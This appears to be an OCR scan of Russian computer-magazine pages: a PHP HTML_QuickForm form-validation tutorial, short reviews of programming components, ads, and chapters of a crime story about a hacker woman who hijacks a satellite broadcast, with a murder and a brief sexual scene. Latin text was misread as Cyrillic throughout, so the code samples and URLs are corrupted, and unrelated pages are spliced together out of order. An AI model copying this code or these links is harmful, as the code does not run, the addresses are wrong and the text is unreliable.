$Рогт->ас1(]ЕІетепЦ'ге$еІ', 'сіеаг', 'Очистить'); 
$Рогт->ас1(]ЕІетепЦ'$иЬтіГ, 'зиЬтіі', 'Отправить'); 
$Рогт->а(ШиІе('етаіГ, 1 'Неверный адрес', 'етаіГ); 
$Рогт->а(]сІРиІе('пате', 'Неверное имя', 'Іеііегзопіу'); 
$Рогт->а(]сІРиІе('пате', 'Неверное имя','тахІепдііі',10); 
$Рогт->асІ(]КиІе('аде', 'Неверный возраст', 'питегіс'); 
$Рогт->а(]сІКиІе('аде', 'Неверный возраст', 'тахіепдф', 2); 
і! ($Тогт->ѵаІі(1аІе()) { 

$Рогт->Тгее 2 е(); 



л Если у тебя по- 
является ошибка, 
гласящая, что не 
удается подклю- 
чить файл 
НТМІ/ОиіскРогт . рИ 
р, нужно изменить 
іпсіисіе-раііі на 
корректный, вы- 
полнив зеІ_іпсІи- 
бе_раіІі(7изг/Іо- 
саІ/ІіЬ/рИр/"); 




л Получить полную 
информацию по 
расширениям РЕАП 
можно на сайте 
И«р://реаг.рИр.пеІ. 



а На нашем диске 
ты найдешь все 
упомянутые в 
статье скрипты, 
официальную доку- 
ментацию по ис- 
пользуемым рас- 
ширениям, а также 
полный комплект 
модулей РЕАП! 



$Рогт->сІі$рІау(); 

?> 



Сейчас настало время разобраться с тем, 
как работает эта проверка. Здесь нет при- 
вычных тебе регулярных выражений, хотя 
они могут использоваться, а все правила 
задаются довольно однообразно, при по- 
мощи метода абсІВиІе, формат которого я 
описывал выше. Тут основную сложность 
представляет составление списка необхо- 
димых параметров, поэтому лучше всего 
разобраться на примере. Если ты не хо- 
чешь набивать руками напечатанный вы- 
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Рис. 4: хакеры идут лесом! 
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ЧИТАЙТЕ В ФЕВРАЛЕ: 

14 рецензий на новинки 
российского кинопроката 

Более 100 обзоров ОѴО-дисков 
5 региона 

Сравнительный тест 

жидкокристаллических 

телевизоров 



Награждение лучших дисков 
2004 года! 




КАЖДЫЙ НОМЕР 

С ФИЛЬМОМ НА 

оѵо 




СОТНИ ПРИЗОВ В 

КАТАЛОГЕ «КОНКУРСЫ» - 
ИЩИ В ОѴО-ПРИЛОЖЕНИИ 





Код РЕАК::ОиіскРогт 



ше код, возьми с диска сценарий под 
именем цТ 5І:аг1:2.рГір и запусти его. Перед 
тобой возникнет уже знакомая форма, и 
если ты попробуешь некорректно запол- 
нить поля, то увидишь сообщения, изо- 
браженные на рисунке 4. Тут надо разо- 
браться, что корректно, а что нет. Не- 
сложно видеть, что для поля етаіе есть 
только одно правило с именем етаіі. Это- 
му правилу соответствует регулярное вы- 
ражение, которое изо всех строк отфиль- 
тровывает только строки, похожие на е- 
таіі-адреса. Аналогично, для поля пате 
исключаются спецсимволы с цифрами и 
устанавливается максимальная длина в 1 0 
символов. Обрати внимание, что это реа- 
лизовано двумя различными правилами, 
нельзя в одном рулесе задать несколько 
критериев. Теперь о том, как работает 
здесь заморозка. Когда сценарий запуска- 
ется безо всяких параметров, логическое 
выражение $Тогт- >ѵаІісІа1;е( ) равно РАІ_8Е, 
поскольку проверять нечего. И поэтому 
Тгееіе не вызывается. Однако когда поля 
формы передаются сценарию, происходит 




Страница модуля НТМІТоттоп, здесь можно скачать по- 
следнюю версию системы и почитать новости 



проверка введенных данных на соответ- 
ствие указанным правилам, и если все 
ОК, вызывается метод Тгееге. 

Да, чуть не забыл. Создавая новые правила, 
ты можешь указать в качестве последнего 
параметра слово «сііепі», что заставит систе- 
му производить проверку на соответствие 
правилам на стороне клиента при помощи 
ЭаѵаЗсгірІ:. Штука эта на самом деле сомни- 
тельная, поскольку обойти такую проверку 
достаточно легко. Однако просто знай, что 
это можно реализовать. ЗС 



правила проверки 



Получить список доступных 
правил проверки можно при 
помощи метода деІВедізІеге- 
бВиІез(). Эта функция воз- 
вращает массив с доступны- 
ми правилами. Вот простень- 
кая программка, которая вы- 
водит на экран все возмож- 
ные правила: 

<? 

гециіге_опсе "НТМЬ/ОиіскРогт.рИр"; 
$Іогт = пеѵѵ НТМІОиіскРогт(ЧптПезГ, ’деГ); 
$агг=$Іогт->деІРедізІегесІПиІез(); 
есГю ,І <ГіЗ>деІРедіз!егесІРиІез()</ИЗ> 11 ; 
Іог($і=0;$і<соип1($агг);++$і){ 
есГю "$і $агг[$і]<Ьг>"; 

} 

?> 



В результате на экране по- 
явятся 12 правил. Вообще 
говоря, этот список можно 
легко расширять, добавляя 
новые рулесы при помощи 
метода гедізіегВиІе. Делает- 
ся это примерно так: $Тогт- 
>гедіз!егВиІе ("ХаВиІе", "ге- 
дех", п [а- 2 ] м ). Здесь [а- 2 ] - 
регулярное выражение, ко- 
торое соответствует наше- 
му правилу. Так что ты без 
проблем сможешь клепать 
свои рулесы, если тебя не 
устраивают 12, идущих по 
дефолту. 







&' 









ІІІГ 





РезегРЗ 

ѴізиаІ С++ 



Описание 

Почему почти все ОС, отличные от 
ѴѴіпсІоѵѵз, умеют читать различные вер- 
сии РАТ и ІМТР5, а окна не хотят вос- 
принимать ничего, кроме своих род- 
ных файловых систем? Я не понимаю 
этого. Чтобы увидеть разделы других 
ОС, приходится использовать сторон- 
ние разработки. Сегодня в обзор попа- 
ла прога, которая умеет работать с 
РІеізегРЗ. 



Ссылки 

Забираем здесь: 

шѵѵ.ргодгаттег$ііеаѵеп.сот/ 

сІ/сІіск.а$рх?Ш=Р34167 




Особые отличия 

□ Программа определяет и может монтировать все 
файловые системы РІеізегРЗ. 

□ Можно без проблем путешествовать по 
директориям, создавать собственные и даже работать 
с файлами. 

□ Есть возможность обмена файлами между 
файловой системой ѴѴіпсІоѵѵз (любой РАТ и ІМТРЗ) и 
ВеізегРЗ. 

□ Отличный пример работы с прямым доступом к диску 
через 13-е прерывание (почему іпЛЗІі ассоциируется у 
меня только с деструкцией? :) - Прим. йг.). 

□ Во время работы с программой ты оказываешься в 
консоли с обширным набором команд. 

В Внешний вид а-ля консоль, пугающий ортодоксальных 
I фанатов ОШ. 





Диагноз 

Исходный код просто супер с любой 
точки зрения - практической и инфор- 
мационной. Изучив тонкости исходни- 
ка, ты узнаешь много нового о файло- 
вых системах, а добавив 6111, полу- 
чишь удобную в использовании про- 
грамму. 



ТАгІГогт 

ОеІрНі /Я 






120 



ТѴѴРСГіапдег 

ОѳІрИіОн — н 



Описание 

Все пользователи любят вешать на свой десктоп вся- 
кие погремушки и различные ерундушки :). Я такие ве- 
щи не особо приветствую, поэтому на экране держу 
только одну иконку - корзину. А вот от хороших обоев 
на рабочем столе никогда не откажусь. Изменять их 
вручную? Иногда лень даже мышку двинуть. Устана- 
вливать спецпрограмму? Лишний мусор в системе, по- 
этому лучше написать свою. Если тоже хочешь напи- 
сать свой чейнджер для обоев, то юзай ТѴѴРСМапдег (в 
общем, чейнджер и без этого компонента займет 15 
строчек кода :). - Прим. Эг.). 



Особые отличия 

□ Одной строкой кода меняет обои на рабочем столе. 

□ Можно указывать стиль обоев - по центру, растянут 
или размножен. 

□ В качестве картинок можно юзать ВМР и РЕС. 

□ Если использовать ^ЕС-картинки, то они автомати- 
чески конвертируются в формат ѴѴіпсіоѵѵз Віітар. 

□ Компонент генерирует события начала и заверше- 
ния смены обоев, что позволяет контролировать про- 
цесс на особо слабых машинах. 



Диагноз 

Если написать хорошую про- 
грамму смены обоев, то на 
ней можно неплохо зарабо- 
тать, и этому есть уже доста- 
точно много подтверждений 
из жизни. А можно написать 
и просто утилитку для души. 



Ссылки 

Забираем файл здесь: 
шѵѵ.іоггу.пеі/ѵсІ/ті$сеГС/ 
шІІрарег$/Жііапдег_14.2Ір 






1 На компакт-диске ты найдешь 
все компоненты из этого обзора 



Описание 

По нажатии Ш+АМеІ в ѴѴіпсіоѵѵз ХР 
можно увидеть симпатичное окно с 
графиком загрузки системы. В прин- 
ципе, сделать такое не слишком слож- 
но, но зачем делать, когда есть гото- 
вое? Сегодня я нашел компонент 
ХРѲгарГі, который удовлетворит твои 
потребности. 



Диагноз 

Этот компонент отлично подходит для 
создания простых графиков. В моей 
практике уже несколько раз была такая 
проблема, когда крутой и наворочен- 
ный СГіаіі: излишен, а создавать что-то 
свое не успеваешь из-за сроков. Рань- 
ше я отказывался от графика вообще, а 
теперь использую ХРѲгарГі, и он окон- 
чательно осел в закладках компонентов 
моего Леірііі. 



Особые отличия 

□ Компонент выглядит отлично и является точной ко- 
пией ХР-варианта отображения загрузки системы. 

□ Легко устанавливается (хотя засовывать один компо- 
нент в отдельный пакет может показаться лишним) и 
работает в любой версии йеІрЫ, в том числе и совер- 
шенно новом йеірііі 2005. 

ЕЗ Изменение параметров графика совершается одной 
строчкой кода. 

ЕЗ История изменений сохраняется и отображается на 
экране автоматически. 

В Нет исходных кодов. Хотя автор и кричит, что компо- 
нент 100% Ргее, но исходники мне не дал даже после 
большой просьбы. А вот зеленых президентов мне жалко 
предлагать, потому что написать такое можно за пару 
дней с перерывами на похмелье. 



Ссылки 

Забираем здесь: 

ѵѵѵѵѵѵ.Іоггу.пеІ/ѵсІ/сИагІз/сІіагіз 

/ХРбгарЫр 



І — 




иРЕС 

ѴізиаІ С++ 



Описание 

Еще 10 лет назад изображения высокого 
качества на компьютере были роскошью. 
Хорошие видеокарты могли работать в ре- 
жиме 256 цветов, а обладатели более де- 
шевых вариантов вообще радовались мо- 
нохромному режиму. В наши добрые вре- 
мена даже самая фуфлыжная плата по- 
зволяет отображать Тше Соіог, так почему 
бы не использовать это? Я предлагаю те- 
бе хорошую библу для работы с ^Е6. 



Особые отличия 

□ Это самая лучшая вариация ^ЕС-алгоритма. Бы- 
страя реализация компрессии, загрузки и распаковки. 

□ Поддержка всех распространенных алгоритмов сжа- 
тия графики - 1 _Щ РНЕ, ^ІЕ, РРМ, ТАРСА и других. 

□ Все параметры - как в других реализациях, а ско- 
рость сжатия и качество выше, потому что можно на- 
страивать качество сжатия от 0 до 100 с шагом в 1. Это 
тебе не Ріюіозіюр. 

□ Библиотека соответствует всем стандартам, поэтому 
сжатые изображения будут правильно поняты другими 
программами. 



Диагноз 

Я не раз видел, как программисты 
ЭеІрГіі использовали эту библиотеку. 
Она настолько хорошо написана, что 
это не составляет труда. Достаточно 
только откомпилировать файлы и под- 
ключить оЬ| к ЭеІрЫ-проекту, что не 
так уж и сложно. 



Ссылки 

Забираем здесь: 
ѵѵѵѵѵѵ.ргодгаттегзіпеаѵеп.сот 
Ш\ скл$рх?ГО=П5259 



им СНаі Шііііу 

ѴізизІ 0++ 



Описание 

Я все время говорю: каждый программист хоть раз в 
жизни должен написать свой собственный чат, потому 
что это необходимый этап в обучении сетевому про- 
граммированию. Сегодня мы посмотрим на исходник 
І_АІ\І СГіаІ: Шііііу, созданный человеком по имени 
ѵіоііпзоп МаІІіеѵѵ Еазоѵѵ. Если ты не первый день в мире 
С++, то наверняка встречался с его работами, потому 
что он написал достаточно много небольших программ 
и классов, доступных в исходных кодах. Несмотря на 
свое название, эта прога не является чатом в том смы- 
сле, к которому мы привыкли. 



Особые отличия 

ЕЗ Программа позволяет отправлять сообщения на 
определенный компьютер. Ты указываешь имя получа- 
теля и отсылаешь текст, который появляется на ком- 
пьютере-адресате в окне диалога. В общем похоже на 
І\ІЕТ ЗЕІ\Ю - так же просто и функционально. 

ЕЗ Прежде чем отправлять сообщение, программа про- 
веряет наличие указанного компьютера в сети. 

ЕЗ Ограничение на отправляемое сообщение - 1000 
символов, что вполне достаточно для отправки практи- 
чески половины страницы текста М3 ѴѴогсІ. 

ЕЗ Программа может отобразить все компьютеры, на- 
ходящиеся сейчас в сети, что облегчит поиск и набор 
имени получателя. 

В Все действия производятся в консольном режиме. 



Диагноз 

Если раньше в своих программах для 
отправки сообщений я использовал 
прямой вызов команды І\ІЕТ ЗЕІ\Ю в 
ОС, то теперь буду использовать тех- 
нологию отправки сообщений из І_АІ\І 
СГіаі Шііііу. Мне она очень понравилась 
своим удобством, простотой и надеж- 
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ностью. 



Чистая почта 

Без спама, без вирусов, без баннеров 



Япйех 



почта 

таіі.уапсіех.ги 






этого его линух слетал только один раз, но тогда удалось быстро все 
настроить. Теперь же загрузочный диск остался на работе, и до своего 
офиса он доберется только к десятому января. Паша уже хотел отло- 
жить комп, но сообразил, что неполадку можно устранить с другого но- 
утбука. У Ани был свой лаптоп, на котором она писала статьи и который 
иногда забирала домой, но сам он никогда на нем не работал. По себе 
знал, как неприятно, когда кто-то копается в твоем рабочем инструмен- 
те. Сейчас ее ноутбук стоял на тумбочке в спальне, хозяйки дома не бы- 
ло, и Паша таки решил им воспользоваться. 

Это был довольно простенький ІВМ хЗІ . Черный, компактный, когда-то, 
возможно, лучший в своем роде. Паша открыл крышку, включил его и 
с удивлением увидел приглашение ввести пароль. По опыту работы с 
клиентами он знал, что любители обычно никогда не ставят пароль на 
вход, так как вводить его каждый раз напрягает, к тому же его можно 
забыть. Обойти пароль для него не было проблемой - он как раз по ра- 
боте изучал стандартные средства защиты, используемые в ноугах ІВМ. 
Достаточно было ввести недокументированную комбинацию, которую 
работники техподдержки использовали для быстрой отладки привози- 
мых ноугов. Пробежавшись пальцами по клавиатуре, Паша убрал приг- 
лашение и тут же встретил новый сюрприз. На экране появилась ме- 
нюшка, в которой предлагалось выбрать одну из шести операционных 
систем: ѴѴіпсІоѵѵз 98, ѴѴіпсІоз ХР, РгееВЗО, ОрепВЗЭ, НесШ І_іпих и 
Зоіагіз. Причем курсор стандартно стоял на ОрепВЗО. 

- Ни хрена себе! - только и мог сказать Паша. Ему доводилось работать 
с ОрепВЗО, но углубленно эту систему он не изучал, предпочитая бо- 
лее распространенную фрю и линукс. Паша никогда не слышал о жур- 
налистах, которые работают под одним из самых сложных юниксов. Это 
была система грамотных админов и зесигііу-специал истов. 

В его памяти пронеслись все те моменты, когда Аня задавала ему со- 
вершенно дурацкие компьютерные вопросы, когда жаловалась, нас- 
колько ее мозг не приспособлен для компьютерной грамотности. Инте- 
ресно, зачем ей это? Неужели ей есть что скрывать... 

Паша загрузил линукс, в очередной раз удивившись, что не установлен ни 
один графический интерфейс и все команды необходимо отдавать в шел- 
ле. Система была настроена настолько грамотно, что он даже усомнился, 
смог ли найти в ней лазейку, если бы потребовалось ее удаленно хакнуть. 
Когда он обнаружил, что большая часть дисков забита зесигИу-утилита- 
ми, эксплоитами и объемными техническими мануалами, то уже не 
удивлялся. Было бы странно, если бы на компьютере, работающем под 
ОрепВЗО, пылились игрушки. На одном из разделов, впрочем, он нашел 
ее статьи, хотя уже был почти уверен, что Аня никакая не журналистка. 
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В комнате было по-праздничному уютно. В углу стояла на- 
ряженная елка, а на люстре, стенах и занавесках висели 
гирлянды. Сам бы Паша вряд ли стал тащить елку на пя- 
тый этаж, но Аня настояла. Мол, какие без нее Новый год 
и Рождество. Все-таки ему чертовски с ней повезло. 

Он сидел за ноутбуком и лениво читал зесигііу-ленту, до- 
жидаясь, когда она вернется. Вечером они планировали 
отметить праздник в уютном итальянском ресторанчике, 
где делали изумительную пиццу и макароны под каким-то необычным 
соусом. А после этого наведаться в ночной клуб, обещавший интерес- 
ную праздничную программу. Паша вспомнил, как провел предыдущее 
Рождество... Сидя в инете, он читал форум и тоскливо смотрел на по- 
желания коллег интересно провести день. Нет, хватит с него виртуаль- 
ной жизни. Аня должна была вернуться через пару часов, и ему внезап- 
но мучительно захотелось ее увидеть. 

Экран на ноутбуке моргнул и неожиданно погас. 

Паша с удивлением смотрел на ноут. После перезагрузки появился 
ВЮЗ, но дальше загружаться система не хотела, ругаясь на ошибку. До 







Папка ѴѴогк, на которую он сразу обратил внимание, была зашифрова- 
на. Он знал, что она наверняка прольет свет на то, кем является его де- 
вушка. Но никакие знания, никакая квалификация не помогли бы ему 
взломать 512-битный ключ шифра. Остальной контент составляли сис- 
темные программы и картинки, содержащие непонятные схемы. 

То, что Паша узнал, вызывало у него двойственные чувства. С одной 
стороны, он испытал что-то вроде восторга от того, что его Аня разби- 
рается в компьютерах, судя по всему, даже лучше, чем он сам. С дру- 
гой стороны, он не понимал, зачем ей было это так скрывать. Причем 
настолько тщательно, что за эти полгода она ни разу не дала ему повод 
заподозрить ее в подобных знаниях. Теперь ему нужно было решать - 
поговорить с ней об этом, попытаться все выяснить или делать вид, что 
он ничего не знает. 

Его размышления прервал звонок в дверь. 

Паша быстро выключил ноутбук, закрыл крышку и поспешил к двери. 
Пожалуй, он поговорит с ней, но не сейчас. Он открыл дверь. 

На пороге стоял высокой молодой парень лет 25 с короткой прической 
под еж, одетый в кожаную курточку и джинсы. В руке у него был порт- 
фель. 

- Здравствуйте. Мы проводим социологический опрос жителей этого 
района относительно строящегося здания. Вы не могли бы заполнить 
нашу анкету? 

Парень вступил в квартиру, и Паша на автомате отошел, давая ему 
пройти. 

- Какую анкету? - недоверчиво спросил он. 

- Я вам сейчас все объясню. 

Молодой человек открыл портфель. Но вместо бумаг в его руке оказал- 
ся пистолет с глушителем. 

- Я не... - хотел было сказать Паша, но пуля, пробившая легкие, заста- 
вила его захлебнуться на полуслове. Вторая попала в сердце, и третья, 
в голову, была уже лишней. 

Микки взглянул на лежавшее на полу тело, аккуратно протер тряпочкой 
из того же портфеля пистолет, положил его рядом с трупом и, убедив- 
шись в глазок, что на лестничной площадке никого нет, ушел. 



Аня назвала адрес таксисту и откинулась на сиденье. В окне проплыва- 
ли московские улицы, но она не замечала домов. Она думала о своем 
будущем. Сейчас у нее было все, о чем можно мечтать. Свой дом, ин- 
тересная работа, любимый парень. Но она устала притворяться. Они с 
Пашей жили вместе уже полгода, и он даже не подозревал, кто она. Аня 
прекрасно знала, чем Паша занимается на работе, - они находились по 
разные стороны баррикад. Он - зесигііу-консультант и администратор 
крупного проекта, конечной целью которого была борьба с хакерами и 
хакерскими атаками. Для себя она даже не могла придумать определе- 
ние. Наверняка журналисты, коллегой которых она официально счита- 
лась, назвали бы ее хакером. Но это словечко слишком притерлось в 
СМИ. К тому же она занималась не только сетевым взломом. 

Если бы восемь лет назад серьезная болезнь не приковала ее к посте- 
ли, у нее сейчас была бы совсем другая жизнь. Ей приходилось целы- 
ми днями сидеть в четырех стенах, и, чтобы девочке было чем себя за- 
нять, родители купили ей компьютер с доступом в интернет. Она чати- 
лась по аське все время, круг ее сетевых знакомств постоянно рос. По- 
ка однажды она не познакомилась с Оео. О хакерах она тогда уже слы- 
шала, но чем они занимались, представляла смутно. Поначалу она, как 
обычно, флиртовала с новым сетевым знакомым. Когда он показал ей 
дефейс крупного сайта, сделанный в ее честь, она была не просто впе- 
чатлена. Она захотела узнать, как это можно сделать. И постепенно Оео 
ввел ее в этот мир. А через три года, когда Оео неожиданно исчез (она 
так и не узнала, куда он пропал), ее опыту и знаниям могли позавидо- 
вать многие зесигііу-специалисты. 

Аню всегда тянуло к запретному. И получение информации, которую так 
старательно скрывают от людских глаз, стало ее страстью. Никто и не 
догадывался, что за многими дерзкими взломами, в результате кото- 
рых информация, стоящая миллионы долларов, утекала на сторону, 
стоит симпатичная 20-летняя девушка. 

К тому времени болезнь Ани уже давно прошла, и она переехала на но- 
вую съемную квартиру, устроившись репортером в газету. Деньги на 
жизнь она зарабатывала совсем другим, проверенным способом. А пи- 
сать шумные статьи и быстро доставать для них информацию ей было 
просто интересно. К тому же ей могло понадобиться прикрытие. 

На работе у нее даже появилась подруга, с которой они вместе ходили 
в клуб и нередко возвращались с новыми приятелями. Но долго в ее 
постели не задерживался никто. Мужчины ее привлекали меньше, чем 



чувства, которые она испытывала от проникновения в святая святых 
крупных компаний и правительственных систем. Подруга Лена, хоть и 
не знала о второй жизни Ани, но замечала что-то ненормальное в ней. 
Однако подколки и попытки серьезно поговорить и во всем разобрать- 
ся проходили мимо. 

Знакомство с Пашей все изменило. Она впервые испытала что-то похо- 
жее на влюбленность, а то, что этот парень специализируется на безо- 
пасности, ее забавляло. С тех пор прошло полгода, и она могла назвать 
их отношения удачными. Если не считать ее обмана, который длился с 
самого начала их встречи. Она попросту боялась, что если все расска- 
жет, может его потерять. 

Именно поэтому взлом новогодней спутниковой трансляции должен 
был стать последним. Заказчик, который к ней обратился, обещал ог- 
ромные деньги, и она долго к этому готовилась, изучая об используе- 
мых системах связи все что только можно. Риск был очень большим, но 
это ее только подзадоривало. 

К вечеру 31 декабря у нее все было готово. Аппаратура, установленная 
на специально снятой для этого квартире, была настроена на перехват 
спутникового сигнала, скрипты запрограммированы автоматически об- 
рабатывать трафик и заменять его приготовленным видео. Когда в но- 
вогоднюю ночь Аня отправилась доставать подарок Паше, она включи- 
ла находящийся в зіеер тобе ноутбук, через длинную цепочку прокси- 
серверов зашла на свой сервер и ввела несколько команд. Потом вык- 
лючила компьютер и вернулась за новогодний стол. Все прошло, как 
было запланировано. 



Молоденькая девушка усердно работала язычком. Она знала, кто перед 
ней, поэтому пыталась как можно лучше угодить мужчине. Кардинал не- 
торопливо курил сигару и наблюдал за юной головкой, склонившейся у 
его паха. «Неплохо, - подумал он, - девочка определенно далеко пой- 
дет. Стоит взять ее на заметку». 

Любовные утехи прервал телефонный звонок. 

- Да? - требовательно сказал Кардинал. 

- Клиент созрел, - ответил голос из трубки. 

- Хорошо, - Кардинал нажал отбой. 

Теперь волноваться не о чем. Девочка продолжала старательно делать 
свое дело, и Кардинал по-отечески погладил ее по головке. 

- Ты моя хорошая. 



Такси остановилось у дома, и, расплатившись с водителем, Аня напра- 
вилась к своему подъезду. Она проголодалась, но перебивать аппетит, 
несмотря на то что дома в холодильнике была куча еды, не собиралась. 
Через пару часов они с Пашкой пойдут в ресторанчик и нормально поедят. 
Поднявшись на свой этаж, Аня позвонила в дверь. У нее был ключ, но 
она любила, когда Паша ее встречает. Ответа не последовало. Она на- 
жала на кнопку звонка еще раз. Паша сказал, что никуда не собирает- 
ся, может, решил сбегать в магазин? 

Девушка достала из прикрепленной к поясу кожаной сумочки ключ, 
вставила в замок... но он был открыт. Аня отворила дверь. От того, что 
она увидела, спина покрылась неприятным холодком, виски интенсив- 
но начали пульсировать. На полу в луже собственной крови лежал Па- 
ша. Его открытые, но пустые глаза смотрели в пол, а неестественная 
поза указывала на то, что сам он уже никогда не поднимется. 

Мозг Ани начал лихорадочно работать. Кому могла понадобиться его 
смерть? В голове пронеслось множество нелепых вариантов. Но один 
из них казался реалистичнее всех остальных. Может быть, хотели уб- 
рать не Пашу, а ее? Она слишком далеко зашла со своими взломами. К 
тому же заказчик зачем-то настаивал на личной передаче денег. Если 
так, убийцы должны быть где-то рядом. 

Аня затаив дыхание, прислушалась ко звукам в квартире. Везде царила 
тишина. Звонить в милицию исключено - слишком мало прошло време- 
ни после взлома эфира, милиция могла докопаться. К тому же, если 
охотились за ней, в отделении до нее могли добраться. Единственным 
выходом, который пришел ей в голову, было бежать. Осторожно прик- 
рыв дверь, она стала спускать по лестнице вниз. Сначала медленно, по- 
том бегом. По дороге чуть не сбила двух поднимающихся мужчин, ко- 
торые, похоже, о чем-то ее спросили, но она не слышала и уже не ос- 
танавливалась. 

Выскочив из подъезда, Аня первым делом увидела стоящую рядом ми- 
лицейскую машину. Застыв на месте, она только через секунду осозна- 
ла, что в ней никого нет. И Аня побежала. Не зная куда, не зная, что бу- 
дет потом. Главное - подальше от этого места. 



Второй раз СгіЬЫе позвонил Антонову через два дня. Вначале он думал, 
что деньги ему выплатят вперед, анонимно, но в реальности оказалось, 
что, если ты претендуешь на награду, нужно обязательно явиться в от- 
деление и подписать кучу бумаг. В планы СгіЬЫ’а это не входило, и он 
повесил трубку. Но время шло, а деньги, чтобы рассчитаться с долгом, 




ВСЕГО ЧЕРЕЗ НЕСКОЛЬКО СЕКУНД. 



брать было неоткуда. В конце концов хакер позвонил следователю сно- 
ва и сообщил адрес. 

Антонов с недоверием отнесся к звонку незнакомца. Он считал, что подоб- 
ный взлом не может совершить один человек, да еще и молодая девуш- 
ка. Скорее всего, звонивший хотел с ней за что-то поквитаться таким вот 
специфичным способом. Но проверить звонок следователь был обязан. 
Выехав по указанному адресу вместе с напарником, Андрей тем време- 
нем размышлял о том, что они имеют. Его ребята смогли выйти на 
прокси-сервер, с которого осуществлялся взлом. Он уже связался с его 
владельцем и потребовал выдачу реального ІР, но полученный айпиш- 
ник был от другого прокси. С его владельцем быстро договориться не 
получилось. Он требовал доказательств причастия к органам, и, учиты- 
вая то, что жил он в Канаде, а русское мыло милицейского отдела ему 
ни о чем не говорило, начались проблемы. А сверху постоянно давили 
и требовали ежедневных отчетов. Параллельно ФСБ приступило к ак- 
тивным действиям - антихакерские рейды начались в Москве и Питере, 
и из закрытой информации было известно, что сотрудники спецслужб 
арестовали около 20 известных в андеграунде хакеров. 

Машина подъехала к нужному дому. 

- Андрей, может, мне здесь остаться? Ну если она надумает скрыться, 

- предложил напарник, высокий опер Иван, который когда-то был луч- 
шим боксером, а теперь стал одним из лучших специалистов по замкам 
и электронике. 

- Пошли со мной. Возможно, понадобится твоя помощь. 

Поднимаясь по лестнице, они столкнулись со спешащей и явно взвол- 
нованной девушкой лет 23-х. 

- Скажите, кто живет в 64 квартире? - спросил Иван, но девушка про- 
неслась мимо, даже не взглянув на него. 

- Что это с ней? 

- Не знаю, - ответил Антонов, но на душе почему-то появилось беспо- 
койство. 

Дверь в квартиру 64 была не закрыта. Толкнув ее, оба милиционера за- 
мерли. Внутри лежал труп. Иван тут же достал пистолет, и оба, осто- 
рожно передвигаясь, исследовали все комнаты. В квартире никого не 
было. 

Андрей подумал о девушке, которая быстро спускалась по лестнице, и, 
кинув на бегу, чтобы напарник вызвал кого надо, побежал вниз. Но бы- 
ло уже слишком поздно - девушка исчезла. 



Аня сидела в неприметной маленькой кафешке и пыталась собраться с 
мыслями. Заказанный кофе остывал на столике - она к нему даже не 
притронулась. Теперь, когда она начала думать более трезво, она поня- 
ла, что поступила глупо. Конечно, нужно было звонить в милицию, в 
конце концов, у нее было алиби: она сидела в интернет-кафе, и это 
подтвердили бы как минимум десять человек. Что именно она там де- 
лала, они никогда бы не узнали. И причин подозревать ее в чем-то дру- 
гом у милиции нет. Ее отпустили бы сегодня же. Теперь же милиция 



знает, что она жила в той квартире и считает, что она скрылась с места 
преступления. Что самое неприятное - она не забрала свой ноутбук, на 
котором были доказательства ее причастности ко многим взломам. 
Правда, добраться через шифр до этих сведений могло у управления 
«К» занять целую вечность. 

Аня думала, у кого она могла бы остановиться, где ее не будут искать. 
Ее, конечно, приютила бы подруга или их с Пашей общие приятели, но 
втягивать их не хотелось. Наконец она достала мобильник и набрала 
номер. 

- Криб, привет. 

- Кто это? - с удивлением спросил СгіЬЫе, услышав женский голос. 

- Это АІкаесІ. Ты мне как-то дал свой номер, сказал, если нужна будет 
помощь - обращаться. 

Последовала долгая пауза. 

-Да. 

- Так вот, нужна твоя помощь. Я попала в большие неприятности. При- 
ютишь меня на некоторое время? 

Мозги СгіЬЫ’а быстро заработали. С одной стороны ему не хотелось 
сталкиваться с человеком, которого он подставил. Но с другой стороны 
девица явно собирается скрыться. И если он сейчас откажет ей в прие- 
ме, 50 штук могут ускользнуть. Тогда ему конец. Наконец хакер ответил. 

- Хорошо. 

Аня записала адрес. 

- Я скоро буду. 

СгіЬЫе какое-то время неподвижно стоял, прижав к уху трубку. А потом 
нажал сброс и начал набирать номер. 



Аня уже долгое время обитала на ІРС, где общалась с подобными ей ребя- 
тами. Она быстро доказала, что ее квалификация высока, и заслужила ува- 
жение. Но о том, что она девушка, никому не говорила. И еще никто не знал, 
чем именно она занимается. АІкаесІ считала, что чем меньше о ней будут 
знать, тем лучше. К тому же она никому не доверяла. 

С СгіЬЫе’ом она сдружилась около двух лет назад. Он, как и она, делал 
взломы на заказ и зарабатывал на этом неплохие деньги. У него было хо- 
рошее чувство юмора и глубокие технические знания, но СгіЬЫе был очень 
скрытным и никогда не говорил о себе. В конце концов ей удалось его раз- 
говорить, но и хакер узнал о ней больше, чем требовалось. Постоянно об- 
щаясь друг с другом в ІРС, они никогда не делали попыток встретиться. И 
когда в Сети становилось известно о новом взломе, научились узнавать по- 
черк друг друга. Через несколько месяцев СгіЬЫе исчез и долго не появлял- 
ся. Где он пропадал, АІкаесІ не знала. Потом он объявился сам, но Аня сра- 
зу почувствовала, что между ними встал невидимый барьер. СгіЬЫе стал 
еще более скрытным, чем вначале и ре не шутил с ней, как прежде. Они 
просто пересекались на канале и трепались на бесполезные темы. 

Номер своего мобильника хакер ей дал еще до своего исчезновения. 
И теперь пришло время им воспользоваться. 





- Не могу я жить в больших просторных квартирах. Как-то не по себе. 
Вот, продал свою четырехкомнатку и решил поселиться здесь. Для ком- 
па места хватает, а что еще надо? - СгіЬЫе постарался, чтобы его голос 
звучал убедительно. 

- Да уж. Холостяцкая берлога во всей красе, - Аня многозначительно 
указала на валяющиеся около дивана носки. 

- Спать будешь на кухне, там есть диван. 

Аня заглянула на кухню. Там хоть и стояла немытая посуда, но сама кух- 
ня и диван в ней были вполне удовлетворительными. Ведь нужно все- 
го лишь некоторое время перекентоваться, потом она что-нибудь при- 
думает. 

- И не беспокойся насчет посетителей. Сюда редко кто приходит. 

Аня решила не говорить, что ей это сразу стало понятно. 

Пожалуй, основной достопримечательностью квартиры была компью- 
терная стойка - два монитора, системный блок, сканер, принтер, кру- 
тая аудиосистема, выделенный кабель, тянущийся к двери. И старень- 
кий ноутбук, валяющийся на диване. 

- Дашь потом воспользоваться компом? 

- Чувствуй себя как дома, - пожал плечами СгіЬЫе. 

Аня присела на диван и устало вздохнула. Это было худшее Рождество 
в ее жизни. 







Дверь ей открыл парень лет 25, в мятой рубашке и с растрепанными во- 
лосами. У него были мешки под глазами от долгого сидения за компом, 
и Аня про себя отметила, что ожидала от него большего. Тем не менее, 
здесь она была не для романтических знакомств, поэтому, поздоровав- 
шись, зашла к нему в однокомнатную квартиру. 

Квартира представляла не более приятное зрелище, чем ее хозяин. 
